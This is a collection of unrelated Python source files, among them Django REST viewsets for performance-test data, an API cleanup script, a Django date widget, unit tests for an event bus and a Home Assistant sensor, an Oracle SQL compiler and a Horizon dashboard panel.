            queryset = queryset.filter(framework__in=framework_ids)
        platform_names = queryset.values_list(
            'platform__platform', flat=True).distinct()
        return Response(platform_names)
class PerformanceFrameworkViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only endpoint listing all performance frameworks."""
    queryset = PerformanceFramework.objects.all()
    serializer_class = PerformanceFrameworkSerializer
    filter_backends = [filters.OrderingFilter]
    # Stable default ordering so clients get deterministic lists.
    ordering = 'id'
class PerformanceDatumViewSet(viewsets.ViewSet):
    """
    This view serves performance test result data
    """
    def list(self, request, project):
        """Return datums grouped by signature hash for the given project.

        At least one of the ``signatures``, ``push_id`` or ``job_id``
        query parameters is required; time-range parameters mirror the
        signature endpoint (relative interval XOR absolute dates).
        """
        repository = models.Repository.objects.get(name=project)
        signature_hashes = request.query_params.getlist("signatures")
        push_ids = request.query_params.getlist("push_id")
        try:
            job_ids = [int(job_id) for job_id in
                       request.query_params.getlist("job_id")]
        except ValueError:
            return Response({"message": "Job id(s) must be specified as integers"},
                            status=HTTP_400_BAD_REQUEST)
        if not (signature_hashes or push_ids or job_ids):
            raise exceptions.ValidationError('Need to specify either '
                                             'signatures, push_id, or '
                                             'job_id')
        datums = PerformanceDatum.objects.filter(
            repository=repository).select_related(
            'signature__signature_hash').order_by('push_timestamp')
        if signature_hashes:
            # Resolve hashes to ids first so the datum filter runs on an
            # integer column rather than joining on the hash.
            signature_ids = PerformanceSignature.objects.filter(
                repository=repository,
                signature_hash__in=signature_hashes).values_list('id', flat=True)
            datums = datums.filter(signature__id__in=list(signature_ids))
        if push_ids:
            datums = datums.filter(push_id__in=push_ids)
        if job_ids:
            datums = datums.filter(job_id__in=job_ids)
        frameworks = request.query_params.getlist('framework')
        if frameworks:
            datums = datums.filter(
                signature__framework__in=frameworks)
        # Relative interval and absolute date range are mutually exclusive.
        interval = request.query_params.get('interval')
        start_date = request.query_params.get('start_date')  # 'YYYY-MM-DDTHH:MM:SS'
        end_date = request.query_params.get('end_date')  # 'YYYY-MM-DDTHH:MM:SS'
        if interval and (start_date or end_date):
            return Response({"message": "Provide either interval only -or- start (and end) date"},
                            status=HTTP_400_BAD_REQUEST)
        if interval:
            datums = datums.filter(
                push_timestamp__gt=datetime.datetime.utcfromtimestamp(
                    int(time.time() - int(interval))))
        if start_date:
            datums = datums.filter(push_timestamp__gt=start_date)
        if end_date:
            datums = datums.filter(push_timestamp__lt=end_date)
        # Group rows by signature hash for the response payload.
        ret = defaultdict(list)
        values_list = datums.values_list(
            'id', 'signature_id', 'signature__signature_hash', 'job_id', 'push_id',
            'push_timestamp', 'value')
        for (id, signature_id, signature_hash, job_id, push_id,
             push_timestamp, value) in values_list:
            ret[signature_hash].append({
                'id': id,
                'signature_id': signature_id,
                'job_id': job_id,
                'push_id': push_id,
                # Timestamps are serialized as Unix epoch seconds.
                'push_timestamp': int(time.mktime(push_timestamp.timetuple())),
                'value': round(value, 2)  # round to 2 decimal places
            })
        return Response(ret)
class AlertSummaryPagination(pagination.PageNumberPagination):
    """Page-number pagination for alert summaries, newest first."""
    ordering = ('-last_updated', '-id')
    page_size = 10
class PerformanceAlertSummaryViewSet(viewsets.ModelViewSet):
    """ViewSet for the performance alert summary model"""
    # Prefetch the alert/signature graph up front to avoid N+1 queries
    # when serializing summaries together with their alerts.
    queryset = PerformanceAlertSummary.objects.filter(repository__active_status='active').prefetch_related(
        'alerts', 'alerts__series_signature',
        'repository',
        'alerts__series_signature__platform',
        'alerts__series_signature__option_collection',
        'alerts__series_signature__option_collection__option')
    permission_classes = (IsStaffOrReadOnly,)
    serializer_class = PerformanceAlertSummarySerializer
    filter_backends = (django_filters.rest_framework.DjangoFilterBackend, filters.OrderingFilter)
    filter_fields = ['id', 'status', 'framework', 'repository',
                     'alerts__series_signature__signature_hash']
    ordering = ('-last_updated', '-id')
    pagination_class = AlertSummaryPagination
    def create(self, request, *args, **kwargs):
        """Create (or return an existing) summary for a push range.

        get_or_create makes repeated requests for the same
        repository/framework/push pair idempotent.
        """
        data = request.data
        alert_summary, _ = PerformanceAlertSummary.objects.get_or_create(
            repository_id=data['repository_id'],
            framework=PerformanceFramework.objects.get(id=data['framework_id']),
            push_id=data['push_id'],
            prev_push_id=data['prev_push_id'],
            defaults={
                'manually_created': True,
                'last_updated': datetime.datetime.now()
            })
        return Response({"alert_summary_id": alert_summary.id})
class PerformanceAlertViewSet(viewsets.ModelViewSet):
    """CRUD endpoint for individual performance alerts."""
    queryset = PerformanceAlert.objects.all()
    permission_classes = (IsStaffOrReadOnly,)
    serializer_class = PerformanceAlertSerializer
    filter_backends = (django_filters.rest_framework.DjangoFilterBackend, filters.OrderingFilter)
    filter_fields = ['id']
    # NOTE(review): ('-id') is just the string '-id', not a 1-tuple.
    # DRF accepts a plain string here so behaviour is unchanged, but
    # ('-id',) was probably intended -- same below in AlertPagination.
    ordering = ('-id')
    class AlertPagination(pagination.CursorPagination):
        # Cursor pagination requires a deterministic ordering.
        ordering = ('-id')
        page_size = 10
    pagination_class = AlertPagination
    def update(self, request, *args, **kwargs):
        # Record who (re)classified the alert before delegating.
        request.data['classifier'] = request.user.email
        return super(PerformanceAlertViewSet, self).update(request, *args, **kwargs)
    def create(self, request, *args, **kwargs):
        """Manually create an alert for a summary/signature pair.

        The change magnitude is recomputed from the raw datums on either
        side of the summary's previous push.
        """
        data = request.data
        if 'summary_id' not in data or 'signature_id' not in data:
            return Response({"message": "Summary and signature ids necessary "
                             "to create alert"}, status=HTTP_400_BAD_REQUEST)
        summary = PerformanceAlertSummary.objects.get(
            id=data['summary_id'])
        signature = PerformanceSignature.objects.get(
            id=data['signature_id'])
        # Window sizes fall back to site-wide defaults when the signature
        # does not define its own.
        prev_range = signature.max_back_window
        if not prev_range:
            prev_range = settings.PERFHERDER_ALERTS_MAX_BACK_WINDOW
        new_range = signature.fore_window
        if not new_range:
            new_range = settings.PERFHERDER_ALERTS_FORE_WINDOW
        # Values strictly before/after the previous push's timestamp.
        prev_data = PerformanceDatum.objects.filter(
            signature=signature,
            push_timestamp__lte=summary.prev_push.time).order_by(
            '-push_timestamp').values_list('value', flat=True)[:prev_range]
        new_data = PerformanceDatum.objects.filter(
            signature=signature,
            push_timestamp__gt=summary.prev_push.time).order_by(
            'push_timestamp').values_list('value', flat=True)[:new_range]
        if not prev_data or not new_data:
            return Response({"message": "Insufficient data to create an "
                             "alert"}, status=HTTP_400_BAD_REQUEST)
        # Mean value on each side of the push boundary.
        prev_value = sum(prev_data)/len(prev_data)
        new_value = sum(new_data)/len(new_data)
        alert_properties = get_alert_properties(prev_value, new_value,
                                                signature.lower_is_better)
        alert, _ = PerformanceAlert.objects.get_or_create(
            summary=summary,
            series_signature=signature,
            defaults={
                'is_regression': alert_properties.is_regression,
                'manually_created': True,
                'amount_pct': alert_properties.pct_change,
                'amount_abs': alert_properties.delta,
                'prev_value': prev_value,
                'new_value': new_value,
                # No statistical test was run for a manual alert; this
                # looks like a sentinel "very confident" t-value -- TODO
                # confirm the intent of 1000.
                't_value': 1000
            })
        return Response({"alert_id": alert.id})
class PerformanceBugTemplateViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only endpoint for per-framework bug-filing templates."""
    queryset = PerformanceBugTemplate.objects.all()
    serializer_class = PerformanceBugTemplateSerializer
    filter_backends = (django_filters.rest_framework.DjangoFilterBackend, filters.OrderingFilter)
    filter_fields = ['framework']
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
import os
import unirest
import time
import json
import pprint
import logging
import argparse
unirest.timeout(120)
IODAPIKEY = os.environ.get('IODAPIKEY')
parser = argparse.ArgumentParser(description='Delete an IOD web connector and its associated text index')
parser.add_argument('--apikey', default=IODAPIKEY)
parser.add_argument('--name', default='')
args = parser.parse_args()
apikey = args.apikey
if apikey:
logging.info("Using apikey: %s" % apikey)
else:
logging.critical("No apikey supplied. Exiting.")
exit(1)
name = args.name
if name:
logging.info("Deleting index/connector: %s" % name)
else:
logging.critical("No name supplied. Exiting.")
exit(1)
# Now delete the index. Call first to get the confirmation token
response = unirest.get("https://api.idolondemand.com/1/api/sync/deletetextindex/v1", headers={"Accept": "application/json"}, params={"index": name, "apikey": apikey})
reply = json.loads(response.raw_body)
pprint.pprint(reply)
confirm = reply['confirm']
print "DELETING INDEX - CONFIRM"
# Now delete the index. Second call with the "confirm" token
response = unirest.get("https://api.idolondemand.com/1/api/sync/deletetextindex/v1", headers={"Accept": "application/json"}, params={"index": name, "apikey": apikey, "confirm": confirm})
reply = json.loads(response.raw_body)
pprint.pprint(reply)
print "DELETING CONNECTOR"
response = unirest.get("https://api.idolondemand.com/1/api/sync/deleteconnector/v1", headers={"Accept": "application/json"}, params={"connector": name, "apikey": apikey})
reply = json.loads(response.raw_body)
pprint.pprint(reply)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
Extra HTML Widget classes
"""
from django.newforms.widgets import Widget, Select
from django.utils.dates import MONTHS
import datetime
__all__ = ('SelectDateWidget',)
class SelectDateWidget(Widget):
    """
    A Widget that splits date input into three <select> boxes.
    This also serves as an example of a Widget that has more than one HTML
    element and hence implements value_from_datadict.
    """
    # Name templates for the three sub-fields; %s is the widget's name.
    month_field = '%s_month'
    day_field = '%s_day'
    year_field = '%s_year'
    def __init__(self, attrs=None, years=None):
        # years is an optional list/tuple of years to use in the "year" select box.
        self.attrs = attrs or {}
        if years:
            self.years = years
        else:
            # Default to a ten-year window starting at the current year.
            this_year = datetime.date.today().year
            self.years = range(this_year, this_year+10)
    def render(self, name, value, attrs=None):
        """Render three <select> elements (month, day, year), newline-joined."""
        try:
            # value may be a 'YYYY-MM-DD' string; anything unparsable
            # (None, a non-string, bad format) yields empty selects.
            value = datetime.date(*map(int, value.split('-')))
            year_val, month_val, day_val = value.year, value.month, value.day
        except (AttributeError, TypeError, ValueError):
            year_val = month_val = day_val = None
        output = []
        # NOTE(review): dict.items() returning a sortable list and in-place
        # .sort() on it is Python 2 behaviour (matches django.newforms era).
        month_choices = MONTHS.items()
        month_choices.sort()
        select_html = Select(choices=month_choices).render(self.month_field % name, month_val)
        output.append(select_html)
        day_choices = [(i, i) for i in range(1, 32)]
        select_html = Select(choices=day_choices).render(self.day_field % name, day_val)
        output.append(select_html)
        year_choices = [(i, i) for i in self.years]
        select_html = Select(choices=year_choices).render(self.year_field % name, year_val)
        output.append(select_html)
        return u'\n'.join(output)
    def value_from_datadict(self, data, name):
        """Recombine the three posted sub-fields into 'YYYY-MM-DD', or None."""
        y, m, d = data.get(self.year_field % name), data.get(self.month_field % name), data.get(self.day_field % name)
        if y and m and d:
            return '%s-%s-%s' % (y, m, d)
        return None
|
unknown
|
codeparrot/codeparrot-clean
| ||
import unittest
import werks.bus
class TestEventHandler(object):
    """Records how the event bus invoked it.

    Each ``cb_*`` method mirrors one callback signature the bus tests
    exercise; received values are stored on the instance so assertions
    can be made after a publish.
    """
    def __init__(self):
        # Nothing has been received yet.
        self.triggered = False
        self.arg = None
        self.kw = None
    def callback(self):
        """No-argument callback; remembers that it fired."""
        self.triggered = True
    def cb_arg(self, arg):
        """Positional-argument callback; stores the received value."""
        self.arg = arg
    def cb_kw(self, kw=None):
        """Keyword-argument callback; stores the received value."""
        self.kw = kw
    def cb_arg_kw(self, arg, kw=None):
        """Mixed callback; stores both received values."""
        self.kw = kw
        self.arg = arg
class EventBusTestCases(unittest.TestCase):
    """Behavioural tests for werks.bus.EventBus publish/subscribe."""

    def test_init_eventbus(self):
        """A bus can be constructed."""
        bus = werks.bus.EventBus()
        self.assertIsNotNone(bus)

    def test_add_channel(self):
        """Adding a channel registers it with no listeners."""
        bus = werks.bus.EventBus()
        bus.add_channel("ch1")
        self.assertIn("ch1", bus.listeners)
        self.assertEqual(len(bus.listeners["ch1"]), 0)

    def test_remove_channel(self):
        """A removed channel disappears from the listener table."""
        bus = werks.bus.EventBus()
        bus.add_channel("ch1")
        bus.remove_channel("ch1")
        self.assertNotIn("ch1", bus.listeners)

    def test_fail_remove_channel(self):
        """Removing a channel that still has a subscriber."""
        bus = werks.bus.EventBus()
        handler = TestEventHandler()
        bus.subscribe("ch1", handler.callback)
        # The expected failure is intentionally not asserted yet:
        # with self.assertRaises(werks.bus.EventBusException):
        #     bus.remove_channel("ch1")

    def test_subscribe_publish(self):
        """Publishing triggers a subscribed callback."""
        bus = werks.bus.EventBus()
        handler = TestEventHandler()
        bus.subscribe("ch1", handler.callback)
        bus.publish("ch1")
        self.assertTrue(handler.triggered)

    def test_unsubscribe(self):
        """Only still-subscribed handlers receive a publish."""
        bus = werks.bus.EventBus()
        first, second = TestEventHandler(), TestEventHandler()
        bus.subscribe("ch1", first.callback)
        bus.subscribe("ch1", second.callback)
        bus.unsubscribe("ch1", first.callback)
        bus.publish("ch1")
        self.assertFalse(first.triggered)
        self.assertTrue(second.triggered)

    def test_pub_no_sub(self):
        """Publishing on a channel nobody listens to is harmless."""
        werks.bus.EventBus().publish("channel_name")
        self.assertTrue(True)

    def test_pub_with_arg(self):
        """A positional argument is forwarded to the callback."""
        bus = werks.bus.EventBus()
        handler = TestEventHandler()
        bus.subscribe("ch1", handler.cb_arg)
        bus.publish("ch1", "arg-value")
        self.assertEqual(handler.arg, "arg-value")

    def test_pub_with_keyword(self):
        """A keyword argument is forwarded to the callback."""
        bus = werks.bus.EventBus()
        handler = TestEventHandler()
        bus.subscribe("ch1", handler.cb_kw)
        bus.publish("ch1", kw="kw-value")
        self.assertEqual(handler.kw, "kw-value")

    def test_multi_pub_with_kw_and_arg(self):
        """Every subscriber receives both positional and keyword values."""
        bus = werks.bus.EventBus()
        first, second = TestEventHandler(), TestEventHandler()
        bus.subscribe("ch1", first.cb_arg_kw)
        bus.subscribe("ch1", second.cb_arg_kw)
        bus.publish("ch1", "arg-value", kw="kw-value")
        for handler in (first, second):
            self.assertEqual(handler.arg, "arg-value")
            self.assertEqual(handler.kw, "kw-value")
unknown
|
codeparrot/codeparrot-clean
| ||
"""The tests for the mFi sensor platform."""
from mficlient.client import FailedToLogin
import pytest
import requests
import homeassistant.components.mfi.sensor as mfi
import homeassistant.components.sensor as sensor_component
from homeassistant.const import TEMP_CELSIUS
from homeassistant.setup import async_setup_component
import tests.async_mock as mock
# Aliases used by the platform-test bodies below.
PLATFORM = mfi
COMPONENT = sensor_component
THING = "sensor"
# A complete, valid mFi sensor platform configuration.
GOOD_CONFIG = {
    "sensor": {
        "platform": "mfi",
        "host": "foo",
        "port": 6123,
        "username": "user",
        "password": "pass",
        "ssl": True,
        "verify_ssl": True,
    }
}
async def test_setup_missing_config(hass):
    """Test setup with missing configuration."""
    with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
        # Required host/credentials are absent, so the platform must bail
        # out before ever constructing a client.
        config = {"sensor": {"platform": "mfi"}}
        assert await async_setup_component(hass, "sensor", config)
        assert not mock_client.called
async def test_setup_failed_login(hass):
    """Test setup with login failure."""
    with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
        mock_client.side_effect = FailedToLogin
        # setup_platform reports failure (falsy) rather than raising.
        assert not PLATFORM.setup_platform(hass, dict(GOOD_CONFIG), None)
async def test_setup_failed_connect(hass):
    """Test setup with connection failure."""
    with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
        mock_client.side_effect = requests.exceptions.ConnectionError
        assert not PLATFORM.setup_platform(hass, dict(GOOD_CONFIG), None)
async def test_setup_minimum(hass):
    """Test setup with minimum configuration (no explicit port)."""
    with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
        config = dict(GOOD_CONFIG)
        del config[THING]["port"]
        assert await async_setup_component(hass, COMPONENT.DOMAIN, config)
        await hass.async_block_till_done()
        assert mock_client.call_count == 1
        # With TLS on and no port given, the port defaults to 6443.
        assert mock_client.call_args == mock.call(
            "foo", "user", "pass", port=6443, use_tls=True, verify=True
        )
async def test_setup_with_port(hass):
    """Test setup with an explicit port."""
    with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
        config = dict(GOOD_CONFIG)
        config[THING]["port"] = 6123
        assert await async_setup_component(hass, COMPONENT.DOMAIN, config)
        await hass.async_block_till_done()
        assert mock_client.call_count == 1
        assert mock_client.call_args == mock.call(
            "foo", "user", "pass", port=6123, use_tls=True, verify=True
        )
async def test_setup_with_tls_disabled(hass):
    """Test setup without TLS (default port drops to 6080)."""
    with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
        config = dict(GOOD_CONFIG)
        del config[THING]["port"]
        config[THING]["ssl"] = False
        config[THING]["verify_ssl"] = False
        assert await async_setup_component(hass, COMPONENT.DOMAIN, config)
        await hass.async_block_till_done()
        assert mock_client.call_count == 1
        assert mock_client.call_args == mock.call(
            "foo", "user", "pass", port=6080, use_tls=False, verify=False
        )
async def test_setup_adds_proper_devices(hass):
    """Test if setup adds devices."""
    with mock.patch(
        "homeassistant.components.mfi.sensor.MFiClient"
    ) as mock_client, mock.patch(
        "homeassistant.components.mfi.sensor.MfiSensor"
    ) as mock_sensor:
        # One port per known sensor model, plus one unknown model that
        # must be ignored by the platform.
        ports = {
            i: mock.MagicMock(model=model) for i, model in enumerate(mfi.SENSOR_MODELS)
        }
        ports["bad"] = mock.MagicMock(model="notasensor")
        mock_client.return_value.get_devices.return_value = [
            mock.MagicMock(ports=ports)
        ]
        assert await async_setup_component(hass, COMPONENT.DOMAIN, GOOD_CONFIG)
        await hass.async_block_till_done()
        # Every recognized port became a sensor; the unknown one did not.
        for ident, port in ports.items():
            if ident != "bad":
                mock_sensor.assert_any_call(port, hass)
        assert mock.call(ports["bad"], hass) not in mock_sensor.mock_calls
@pytest.fixture(name="port")
def port_fixture():
    """Port fixture."""
    return mock.MagicMock()
@pytest.fixture(name="sensor")
def sensor_fixture(hass, port):
    """Sensor fixture wrapping the mocked port."""
    return mfi.MfiSensor(port, hass)
async def test_name(port, sensor):
    """Test the name."""
    assert port.label == sensor.name
async def test_uom_temp(port, sensor):
    """Test the UOM for temperature."""
    port.tag = "temperature"
    assert TEMP_CELSIUS == sensor.unit_of_measurement
async def test_uom_power(port, sensor):
    """Test the UOM for power."""
    port.tag = "active_pwr"
    assert sensor.unit_of_measurement == "Watts"
async def test_uom_digital(port, sensor):
    """Test the UOM for a digital input."""
    port.model = "Input Digital"
    assert sensor.unit_of_measurement == "State"
async def test_uom_unknown(port, sensor):
    """Test that an unknown tag is used as the UOM verbatim."""
    port.tag = "balloons"
    assert sensor.unit_of_measurement == "balloons"
async def test_uom_uninitialized(port, sensor):
    """Test that the UOM defaults if not initialized."""
    # Reading .tag raises, simulating a port with no data yet.
    type(port).tag = mock.PropertyMock(side_effect=ValueError)
    assert sensor.unit_of_measurement == "State"
async def test_state_digital(port, sensor):
    """Test a digital input's state (any non-zero value is ON)."""
    port.model = "Input Digital"
    port.value = 0
    assert mfi.STATE_OFF == sensor.state
    port.value = 1
    assert mfi.STATE_ON == sensor.state
    port.value = 2
    assert mfi.STATE_ON == sensor.state
async def test_state_digits(port, sensor):
    """Test rounding of a numeric state to the per-tag digit count."""
    port.tag = "didyoucheckthedict?"
    port.value = 1.25
    with mock.patch.dict(mfi.DIGITS, {"didyoucheckthedict?": 1}):
        assert sensor.state == 1.2
    with mock.patch.dict(mfi.DIGITS, {}):
        # No DIGITS entry means rounding to zero decimal places.
        assert sensor.state == 1.0
async def test_state_uninitialized(port, sensor):
    """Test the state of uninitialized sensors."""
    type(port).tag = mock.PropertyMock(side_effect=ValueError)
    assert mfi.STATE_OFF == sensor.state
async def test_update(port, sensor):
    """Test that update() refreshes the underlying port exactly once."""
    sensor.update()
    assert port.refresh.call_count == 1
    assert port.refresh.call_args == mock.call()
|
unknown
|
codeparrot/codeparrot-clean
| ||
__all__ = ('override_settings',)
try:
    from django.test.utils import override_settings
except ImportError:
    # we are in Django 1.3
    from django.conf import settings, UserSettingsHolder
    from django.utils.functional import wraps

    class override_settings(object):
        """
        Acts as either a decorator, or a context manager. If it's a decorator
        it takes a function and returns a wrapped function. If it's a
        contextmanager it's used with the ``with`` statement. In either event
        entering/exiting are called before and after, respectively,
        the function/block is executed.
        This class was backported from Django 1.5
        As django.test.signals.setting_changed is not supported in 1.3,
        it's not sent on changing settings.
        """
        def __init__(self, **kwargs):
            self.options = kwargs
            # Remember the live settings holder so disable() can restore it.
            self.wrapped = settings._wrapped

        def __enter__(self):
            self.enable()

        def __exit__(self, exc_type, exc_value, traceback):
            self.disable()

        def __call__(self, test_func):
            # Imported lazily to avoid pulling in the test machinery at
            # module import time.
            from django.test import TransactionTestCase
            if isinstance(test_func, type):
                if not issubclass(test_func, TransactionTestCase):
                    # Bug fix: the message previously named SimpleTestCase,
                    # but the check is against TransactionTestCase (and
                    # SimpleTestCase does not exist in Django 1.3).
                    raise Exception(
                        "Only subclasses of Django TransactionTestCase "
                        "can be decorated with override_settings")
                original_pre_setup = test_func._pre_setup
                original_post_teardown = test_func._post_teardown

                def _pre_setup(innerself):
                    # Apply overrides before the test's own setup runs.
                    self.enable()
                    original_pre_setup(innerself)

                def _post_teardown(innerself):
                    # Restore settings only after the test's own teardown.
                    original_post_teardown(innerself)
                    self.disable()
                test_func._pre_setup = _pre_setup
                test_func._post_teardown = _post_teardown
                return test_func
            else:
                @wraps(test_func)
                def inner(*args, **kwargs):
                    with self:
                        return test_func(*args, **kwargs)
                return inner

        def enable(self):
            # Layer the overrides on top of the current settings.
            override = UserSettingsHolder(settings._wrapped)
            for key, new_value in self.options.items():
                setattr(override, key, new_value)
            settings._wrapped = override

        def disable(self):
            # Restore the settings holder captured at construction time.
            settings._wrapped = self.wrapped
unknown
|
codeparrot/codeparrot-clean
| ||
Title: pandas 3.0.0 release candidate ready for testing!
Date: 2025-12-12
# pandas 3.0.0 release candidate ready for testing!
We're excited to announce the release candidate for pandas 3.0. This major
release brings significant improvements to pandas, but also features some
potentially breaking changes.
To ensure a smooth pandas 3.0 release, we can use your help to [test the
release candidate now](#call-to-action-test-the-release-candidate).
## Highlights of pandas 3.0
pandas 3.0 introduces several major enhancements:
- **Dedicated string data type by default**: string columns are now inferred as
the new `str` dtype instead of `object`, providing better performance and type
safety
- **Consistent copy/view behaviour with Copy-on-Write (CoW)** (a.k.a. getting
rid of the SettingWithCopyWarning): more predictable and consistent behavior
for all operations, with improved performance through avoiding unnecessary
copies
- **New `pd.col` syntax**: initial support for `pd.col()` as a simplified syntax
for creating callables in `DataFrame.assign`
Further, pandas 3.0 includes a lot of other improvements and bug fixes. You can
find the complete list of changes in our
[release notes](https://pandas.pydata.org/docs/dev/whatsnew/v3.0.0.html).
## Important changes requiring code updates
As a major release, pandas 3.0 includes some breaking changes that may require
updates to your code. The two most significant changes are:
### 1. Dedicated string data type by default
Starting with pandas 3.0, string columns are automatically inferred as `str`
dtype instead of the numpy `object` (which can store any Python object).
**Example:**
```python
# Old behavior (pandas < 3.0)
>>> ser = pd.Series(["a", "b"])
>>> ser
0 a
1 b
dtype: object # <-- numpy object dtype
# New behavior (pandas 3.0)
>>> ser = pd.Series(["a", "b"])
>>> ser
0 a
1 b
dtype: str # <-- new string dtype
```
This change improves performance and type safety, but may require code updates,
especially for library code that currently looks for "object" dtype when
expecting string data.
For more details, see the
[migration guide for the new string data type](https://pandas.pydata.org/docs/dev/user_guide/migration-3-strings.html).
### 2. Consistent copy/view behaviour with Copy-on-Write (CoW)
Copy-on-Write is now the default and only mode in pandas 3.0. This makes
behavior more consistent and predictable, but requires updates to certain coding
patterns.
The most impactful change is that **chained assignment will no longer work**.
As a result, the `SettingWithCopyWarning` is also removed (since there is no
longer ambiguity whether it would work or not), and defensive `.copy()` calls
to silence the warning are no longer needed.
**Example:**
```python
# Old behavior (pandas < 3.0) - chained assignment
df["foo"][df["bar"] > 5] = 100  # This might modify df (unpredictable)
# New behavior (pandas 3.0) - must do the modification in one step (e.g. with .loc)
df.loc[df["bar"] > 5, "foo"] = 100
```
In general, any result of an indexing operation or method now always behaves as
if it were a copy, so modifications of the result won't affect the original
DataFrame.
For more details, see the
[Copy-on-Write migration guide](https://pandas.pydata.org/docs/dev/user_guide/copy_on_write.html#migrating-to-copy-on-write).
## Call to Action: test the Release Candidate
We need your help to ensure a smooth pandas 3.0 release!
Especially if you have pandas code in production or maintain a library with
pandas as a dependency, it is strongly recommended to run your test suites with
the release candidate, and report any issue to our issue tracker before the
official 3.0.0 release.
How can you best test the release candidate?
1. **First update to the latest released pandas 2.3** (if you are not already
running that version) and test it with your codebase. It is recommended to
resolve any deprecation warning before upgrading to pandas 3.0.
2. Optionally, you can already enable the new string dtype and Copy-on-Write
mode using pandas 2.3 (`pd.options.future.infer_string = True` and
`pd.options.mode.copy_on_write = True`).
3. **Install the release candidate** (see below) and test it with your codebase
4. **Run your existing code** to identify any issues or needed updates
5. **Report any problems** you encounter on our [GitHub repository issue tracker](https://github.com/pandas-dev/pandas/issues)
The more testing we get now, the smoother the final pandas 3.0 release will be
for everyone. Your feedback is crucial for making this a successful release!
### Getting the Release Candidate
You can install the latest pandas 3.0 release candidate from PyPI:
```bash
python -m pip install --upgrade --pre pandas==3.*
```
Or from conda-forge using conda/mamba:
```bash
conda install -c conda-forge/label/pandas_rc pandas=3
```
|
unknown
|
github
|
https://github.com/pandas-dev/pandas
|
web/pandas/community/blog/pandas-3.0-release-candidate.md
|
from django.db.models.sql import compiler
class SQLCompiler(compiler.SQLCompiler):
    def as_sql(self, with_limits=True, with_col_aliases=False):
        """
        Creates the SQL for this query. Returns the SQL string and list
        of parameters. This is overridden from the original Query class
        to handle the additional SQL Oracle requires to emulate LIMIT
        and OFFSET.
        If 'with_limits' is False, any limit/offset information is not
        included in the query.
        """
        # The `do_offset` flag indicates whether we need to construct
        # the SQL needed to use limit/offset with Oracle.
        do_offset = with_limits and (self.query.high_mark is not None or self.query.low_mark)
        if not do_offset:
            sql, params = super().as_sql(with_limits=False, with_col_aliases=with_col_aliases)
        else:
            # Column aliases are forced on so the inner query's columns
            # cannot collide with the synthetic "_RN" row-number column.
            sql, params = super().as_sql(with_limits=False, with_col_aliases=True)
            # Wrap the base query in an outer SELECT * with boundaries on
            # the "_RN" column. This is the canonical way to emulate LIMIT
            # and OFFSET on Oracle.
            high_where = ''
            if self.query.high_mark is not None:
                high_where = 'WHERE ROWNUM <= %d' % (self.query.high_mark,)
            if self.query.low_mark:
                sql = (
                    'SELECT * FROM (SELECT "_SUB".*, ROWNUM AS "_RN" FROM (%s) '
                    '"_SUB" %s) WHERE "_RN" > %d' % (sql, high_where, self.query.low_mark)
                )
            else:
                # Simplify the query to support subqueries if there's no offset.
                sql = (
                    'SELECT * FROM (SELECT "_SUB".* FROM (%s) "_SUB" %s)' % (sql, high_where)
                )
        return sql, params
class SQLInsertCompiler(compiler.SQLInsertCompiler, SQLCompiler):
    # INSERTs need no Oracle-specific LIMIT/OFFSET handling; mix in the
    # local SQLCompiler for consistency with the other statement types.
    pass
class SQLDeleteCompiler(compiler.SQLDeleteCompiler, SQLCompiler):
    # DELETEs likewise require no special handling.
    pass
class SQLUpdateCompiler(compiler.SQLUpdateCompiler, SQLCompiler):
    # UPDATEs likewise require no special handling.
    pass
class SQLAggregateCompiler(compiler.SQLAggregateCompiler, SQLCompiler):
    # Aggregate subqueries pick up the LIMIT/OFFSET emulation via the
    # inherited SQLCompiler.as_sql.
    pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
```{eval-rst}
.. currentmodule:: torch.profiler
```
# torch.profiler
## Overview
```{eval-rst}
.. automodule:: torch.profiler
```
## API Reference
```{eval-rst}
.. autoclass:: torch.profiler._KinetoProfile
:members:
.. autoclass:: torch.profiler.profile
:members:
.. autoclass:: torch.profiler.ProfilerAction
:members:
.. autoclass:: torch.profiler.ProfilerActivity
:members:
.. autofunction:: torch.profiler.schedule
.. autofunction:: torch.profiler.tensorboard_trace_handler
```
## Intel Instrumentation and Tracing Technology APIs
```{eval-rst}
.. autofunction:: torch.profiler.itt.is_available
.. autofunction:: torch.profiler.itt.mark
.. autofunction:: torch.profiler.itt.range_push
.. autofunction:: torch.profiler.itt.range_pop
```
<!-- This module needs to be documented. Adding here in the meantime
for tracking purposes -->
```{eval-rst}
.. py:module:: torch.profiler.itt
.. py:module:: torch.profiler.profiler
.. py:module:: torch.profiler.python_tracer
```
|
unknown
|
github
|
https://github.com/pytorch/pytorch
|
docs/source/profiler.md
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.utils.translation import ugettext_lazy as _
import horizon
from openstack_dashboard.api import neutron
from openstack_dashboard.dashboards.project import dashboard
LOG = logging.getLogger(__name__)
class LoadBalancer(horizon.Panel):
    """Project dashboard panel for the Neutron LBaaS service."""

    name = _("Load Balancers")
    slug = "loadbalancers"
    permissions = ('openstack.services.network',)

    def allowed(self, context):
        """Display the panel only when the user may use Neutron LBaaS."""
        request = context['request']
        # Guard clause: the user must hold the networking permission.
        if not request.user.has_perms(self.permissions):
            return False
        # The LBaaS extension must be enabled; a failure talking to Neutron
        # hides the panel rather than breaking the dashboard.
        try:
            lbaas_enabled = neutron.is_service_enabled(request,
                                                       config_name='enable_lb',
                                                       ext_name='lbaas')
        except Exception:
            LOG.error("Call to list enabled services failed. This is likely "
                      "due to a problem communicating with the Neutron "
                      "endpoint. Load Balancers panel will not be displayed.")
            return False
        if not lbaas_enabled:
            return False
        # Finally defer to the base Panel checks.
        if not super(LoadBalancer, self).allowed(context):
            return False
        return True

